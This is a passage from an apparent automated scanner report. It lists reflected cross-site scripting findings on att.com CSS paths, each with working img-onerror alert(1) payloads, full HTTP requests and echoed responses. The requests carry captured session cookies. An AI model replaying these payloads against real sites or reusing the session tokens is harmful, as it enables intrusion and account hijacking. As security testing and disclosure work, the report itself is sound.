Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9091
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:37 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css60a08"><img src=a onerror=alert(1)>acc7ba1b7c1/css-includes.css">
...[SNIP]...

1.8. https://www.att.com/olam/css/css-includes.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/css-includes.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caacc"><img%20src%3da%20onerror%3dalert(1)>ab93521d083 was submitted in the REST URL parameter 3. This input was echoed as caacc"><img src=a onerror=alert(1)>ab93521d083 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css/css-includes.csscaacc"><img%20src%3da%20onerror%3dalert(1)>ab93521d083 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9091
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:44 GMT
Connection: keep-alive
Set-Cookie: TLTHID=5958DA180B8C100B72B1DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css/css-includes.csscaacc"><img src=a onerror=alert(1)>ab93521d083">
...[SNIP]...

1.9. https://www.att.com/olam/css/footerNav.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/footerNav.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2772f"><img%20src%3da%20onerror%3dalert(1)>8c5bd8ac3a6 was submitted in the REST URL parameter 2. This input was echoed as 2772f"><img src=a onerror=alert(1)>8c5bd8ac3a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css2772f"><img%20src%3da%20onerror%3dalert(1)>8c5bd8ac3a6/footerNav.css HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:38 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css2772f"><img src=a onerror=alert(1)>8c5bd8ac3a6/footerNav.css">
...[SNIP]...

1.10. https://www.att.com/olam/css/footerNav.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/footerNav.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df448"><img%20src%3da%20onerror%3dalert(1)>da20a7a5695 was submitted in the REST URL parameter 3. This input was echoed as df448"><img src=a onerror=alert(1)>da20a7a5695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css/footerNav.cssdf448"><img%20src%3da%20onerror%3dalert(1)>da20a7a5695 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:45 GMT
Connection: keep-alive
Set-Cookie: TLTHID=59F4EBBA0B8C100B72CBDD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css/footerNav.cssdf448"><img src=a onerror=alert(1)>da20a7a5695">
...[SNIP]...

1.11. https://www.att.com/olam/css/leftNav.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/leftNav.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c11e0"><img%20src%3da%20onerror%3dalert(1)>705e74fdf54 was submitted in the REST URL parameter 2. This input was echoed as c11e0"><img src=a onerror=alert(1)>705e74fdf54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/cssc11e0"><img%20src%3da%20onerror%3dalert(1)>705e74fdf54/leftNav.css HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9086
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:38 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/cssc11e0"><img src=a onerror=alert(1)>705e74fdf54/leftNav.css">
...[SNIP]...

1.12. https://www.att.com/olam/css/leftNav.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/leftNav.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 475c1"><img%20src%3da%20onerror%3dalert(1)>5490f35dfb8 was submitted in the REST URL parameter 3. This input was echoed as 475c1"><img src=a onerror=alert(1)>5490f35dfb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css/leftNav.css475c1"><img%20src%3da%20onerror%3dalert(1)>5490f35dfb8 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9086
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:45 GMT
Connection: keep-alive
Set-Cookie: TLTHID=59F4E12E0B8C100B72CADD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css/leftNav.css475c1"><img src=a onerror=alert(1)>5490f35dfb8">
...[SNIP]...

1.13. https://www.att.com/olam/css/primaryNav.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/primaryNav.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a83c8"><img%20src%3da%20onerror%3dalert(1)>f9b89fd5173 was submitted in the REST URL parameter 2. This input was echoed as a83c8"><img src=a onerror=alert(1)>f9b89fd5173 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/cssa83c8"><img%20src%3da%20onerror%3dalert(1)>f9b89fd5173/primaryNav.css HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9089
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:37 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
